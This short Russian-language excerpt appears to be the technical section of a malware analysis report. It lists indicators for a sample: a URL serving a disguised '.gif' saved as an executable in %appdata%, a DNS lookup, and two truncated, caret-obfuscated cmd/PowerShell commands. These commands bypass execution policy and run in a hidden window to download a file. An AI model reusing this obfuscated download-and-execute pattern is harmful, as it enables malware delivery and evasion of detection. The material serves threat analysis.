Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^w^e^rSh^ell^.^ex^E ^-e^xEcUTioNP^OL^ICy^ ^bY^Pass -nopr^Of^Ile -W^IND^OW^styl^e H^Id^DeN ^(NeW^-O^bjEC^T s^YST^e^M.nE^t.W^EBCLIE^NT^).doWnLOadF^Ile(^'http://www.doorasope.to...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "Po^w^e^rSh^ell^.^ex^E ^-e^xEcUTioNP^OL^ICy^ ^bY^Pass -nopr^Of^Ile -W^IND^OW^styl^e H^Id^DeN ^(NeW^-O^bjEC^T s^YST^e^M.nE^t.W^EBCLIE^NT^).doWnLOadF^Ile(^'http://www.doorasope.to...' (со скрытым окном)